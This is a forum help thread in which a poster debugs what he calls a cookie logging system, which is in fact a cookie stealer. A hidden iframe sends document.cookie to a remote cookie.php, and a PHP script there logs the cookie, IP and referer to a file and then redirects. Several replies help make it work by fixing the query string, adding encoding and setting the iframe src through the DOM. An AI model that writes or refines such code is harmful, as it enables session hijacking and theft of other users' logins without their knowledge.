Web Analytics Made Easy -
StatCounter Anyone please help me - first time poster - CodingForum

Announcement

Collapse
No announcement yet.

Anyone please help me - first time poster

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Anyone please help me - first time poster

    Hello,

    I am trying to implement a cookie logging system between my two sites using javascript/php and have a fair bit of experience but this is killing me:

    I have this in one my my sites pages:

    <IFRAME WIDTH=500 HEIGHT=350 frameborder=0 SRC=javascript:void(document.location="http://www.mysite.com/cookie.php?c"+document.cookie)></iframe>

    at mysite.com the php file has the following code:

    <?php
    $cookie = $_GET['c'];
    $ip = getenv ('REMOTE_ADDR');
    $date=date("j F, Y, g:i a");;
    $referer=getenv ('HTTP_REFERER');
    $fp = fopen('cookies.html', 'a');
    fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
    fclose($fp);
    header ("Location: http://www.theothersite.com");
    ?>


    Everything logs other than the cookies. I tested that document.cookies is accessible from the site with <script>alert(document.cookie)</script> and it pops up with a cookie contents.

    Why would this not pass the cookie?

    (caveat: Although this looks dodgy I do have legitimate reasons for needing this).

    Cheers,

    Bruce

  • #2
    I'm not entirely sure, but shouldn't your iframe link to "http://www.mysite.com/cookie.php?c="+document.cookie? You're missing that = at the end of the URL string.
    Useful function to retrieve difference in times
    The best PHP resource
    A good PHP FAQ
    PLEASE remember to wrap your code in [PHP] tags.
    PHP Code:
    // Replace this
    if(isset($_POST['submitButton']))
    // With this
    if(!empty($_POST))
    // Then check for values/forms. Some IE versions don't send the submit button 
    Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live.

    Comment


    • #3
      Originally posted by BluePanther View Post
      I'm not entirely sure, but shouldn't your iframe link to "http://www.mysite.com/cookie.php?c="+document.cookie? You're missing that = at the end of the URL string.
      Hi thanks for replying, you don't need to add the = as far as I know for php to pickup the syntax. In any case it still doesnt work, anymore suggestions?

      Comment


      • #4
        You definitely need the = — otherwise how would PHP know where the key ends and the value begins?

        Anyway, that javascript:void thing in the src attribute is no good. There's no way to assure that every browser will do what you expect (I just ran a little test: Chrome does, IE doesn't).

        Just do it the clean way, and use DOM manipulation to set the src on page load, and you'll be fine.

        Edit: Also, using encodeURIComponent on the cookie before putting it into the query string can't be a bad idea.
        Last edited by venegal; Aug 19, 2011, 01:43 PM.
        .My new Javascript tutorial site: http://reallifejs.com/
        .Latest article: Calculators — Tiny jQuery calculator, Full-fledged OOP calculator, Big number calculator
        .Latest quick-bit: Including jQuery — Environment-aware minification and CDNs with local fallback

        Comment


        • #5
          Originally posted by gogogo View Post
          Hi thanks for replying, you don't need to add the = as far as I know for php to pickup the syntax. In any case it still doesnt work, anymore suggestions?
          I beg to differ.
          javascript:void(document.location="http://www.mysite.com/cookie.php?c"+document.cookie)>

          $cookie = $_GET['c'];

          How do you expect PHP to parse the query string and put the cookie value into $_GET['c'] if it has no = symbol to parse the string by? - It also needs & between different variables too
          "Tango says double quotes with a single ( ' ) quote in the middle"
          '$Name says single quotes with a double ( " ) quote in the middle'
          "Tango says double quotes ( \" ) must escape a double quote"
          '$Name single quotes ( \' ) must escape a single quote'

          Comment


          • #6
            Originally posted by venegal View Post
            You definitely need the = — otherwise how would PHP know where the key ends and the value begins?

            Anyway, that javascript:void thing in the src attribute is no good. There's no way to assure that every browser will do what you expect (I just ran a little test: Chrome does, IE doesn't).

            Just do it the clean way, and use DOM manipulation to set the src on page load, and you'll be fine.
            Ok, I see. I have changed the code to this, yet still to no avail:

            <iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>
            <script>
            frames["log"].location.href="http://www.xxx.com/cookie.php?c=" + document.cookie;
            </script>


            I used <script></script> because testing the return of cookie via <script>alert(document.cookie)</script> did work reassuring me that I am on the right tracks with making use of these tags. I really have no idea when it comes to DOM manupulation, particularly in the context of using iframes, any further help would be gratefully received.
            Last edited by gogogo; Aug 19, 2011, 02:14 PM.

            Comment


            • #7
              Originally posted by tangoforce View Post
              I beg to differ.
              javascript:void(document.location="http://www.mysite.com/cookie.php?c"+document.cookie)>

              $cookie = $_GET['c'];

              How do you expect PHP to parse the query string and put the cookie value into $_GET['c'] if it has no = symbol to parse the string by? - It also needs & between different variables too
              Ok thanks for your input. I have spent hours and hours on this, can you look at my post after yours and tell me if you see a problem with it (and the interaction with my php script)



              I have now deduced that it is not a problem with the java- it is a problem with how the parameter is being passed. check this out:

              <iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

              <script>

              cookie=document.cookie

              frames["log"].location.href="http://www.xxx.com/cookie.php?c="+cookie;


              </script>


              The php log doesn't show anything.


              <iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

              <script>



              frames["log"].location.href="http://www.xxx.com/cookie.php?c=hello"


              </script>


              The log still doesnt show anything.



              <iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

              <script>



              frames["log"].location.href="http://www.xxx.com/cookie.php?"


              </script>


              The log shows everything (ip, referer etc) EXCEPT the cookie (which is correct). But that means the passing of the parameter c using php?c= is not compatable with the PHP receiving script. Why is that?
              Last edited by gogogo; Aug 19, 2011, 02:43 PM.

              Comment


              • #8
                Originally posted by gogogo View Post
                frames["log"].location.href="http://www.xxx.com/cookie.php?c=" + document.cookie;
                I meant "set the src" as in
                PHP Code:
                document.getElementById('log').src "http://www.xxx.com/cookie.php?c=" document.cookie
                .My new Javascript tutorial site: http://reallifejs.com/
                .Latest article: Calculators — Tiny jQuery calculator, Full-fledged OOP calculator, Big number calculator
                .Latest quick-bit: Including jQuery — Environment-aware minification and CDNs with local fallback

                Comment


                • #9
                  Originally posted by venegal View Post
                  I meant "set the src" as in
                  PHP Code:
                  document.getElementById('log').src "http://www.xxx.com/cookie.php?c=" document.cookie


                  Ok I recognise that as a good solution, I tried it with the following:

                  Code:
                  <iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>
                  
                  <script>
                  document.getElementById('log').src = "http://www.xxx.com/cookie.php?c=" + document.cookie;  
                  </script>

                  yet my php log doesn't receive anything (actually it doesn't record the ip etc.. either) hmm.


                  I even simplified it by doing:


                  Code:
                  <iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>
                  
                  <script>
                  document.getElementById('log').src = "http://www.xxx.com/cookie.php"
                  </script>
                  And the log showed nothing- the usage must be wrong (sorry if this my fault).


                  Going back to this usage:


                  Code:
                  <iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>
                  
                  <script>
                  frames["log"].location.href="http://www.xxx.com/cookie.php"
                  </script>

                  It does work in terms of ip and referer- something must be happening to the 'c' paramater- god damn it! lol
                  Last edited by gogogo; Aug 19, 2011, 02:53 PM.

                  Comment


                  • #10
                    Originally posted by gogogo View Post
                    you don't need to add the = as far as I know for php to pickup the syntax.
                    Originally posted by gogogo View Post
                    I have now deduced that it is not a problem with the java- it is a problem with how the parameter is being passed.
                    Seriously, you're so good at this PHP stuff that I don't think I need to help you out here to be honest so I'll wish you well and stop assisting you.
                    "Tango says double quotes with a single ( ' ) quote in the middle"
                    '$Name says single quotes with a double ( " ) quote in the middle'
                    "Tango says double quotes ( \" ) must escape a double quote"
                    '$Name single quotes ( \' ) must escape a single quote'

                    Comment


                    • #11
                      Originally posted by tangoforce View Post
                      Seriously, you're so good at this PHP stuff that I don't think I need to help you out here to be honest so I'll wish you well and stop assisting you.
                      Hello, this is only my second week learning php, did you mean that honestly or sarcastically? Sorry about my English I am learning that too!

                      EDIT: ok I read the quotes you highlighted so I seem to have upset you because I appeared to try to show that I know more than I actually do- that was not my intention, I tried to be forthright with what I found out to help find the solution. Please don't stop assisting me !
                      Last edited by gogogo; Aug 19, 2011, 03:13 PM.

                      Comment


                      • #12
                        No, you were suggesting that YOU had identified the problem with the way you're passing data. The reality is that WE had been telling you and you attempted to suggest that you knew best and we must be wrong. We're here to help, not to try and score points from each other.
                        "Tango says double quotes with a single ( ' ) quote in the middle"
                        '$Name says single quotes with a double ( " ) quote in the middle'
                        "Tango says double quotes ( \" ) must escape a double quote"
                        '$Name single quotes ( \' ) must escape a single quote'

                        Comment


                        • #13
                          Originally posted by tangoforce View Post
                          No, you were suggesting that YOU had identified the problem with the way you're passing data. The reality is that WE had been telling you and you attempted to suggest that you knew best and we must be wrong. We're here to help, not to try and score points from each other.

                          Ok I conceded that the "=" is necessary and thanked the correction. I then proved with examples how I 'deduced' that there was a problem passing the paramater- and nobody corrected me on this. This proof didn't undermine any of the previous help given I don't think- I am using the code that was provided. How am I upset you?

                          Comment


                          • #14
                            In your script do this:

                            var_dump($_GET);

                            Please post the result.
                            "Tango says double quotes with a single ( ' ) quote in the middle"
                            '$Name says single quotes with a double ( " ) quote in the middle'
                            "Tango says double quotes ( \" ) must escape a double quote"
                            '$Name single quotes ( \' ) must escape a single quote'

                            Comment


                            • #15
                              Originally posted by tangoforce View Post
                              In your script do this:

                              var_dump($_GET);

                              Please post the result.
                              There is a problem with my webserver at the moment so I can't edit my php file yet- once it is up and running I will be back! If you are available that will be great, but if not I thank you for all your help so far, I really didn't mean anything bad.

                              Comment

                              Working...
                              X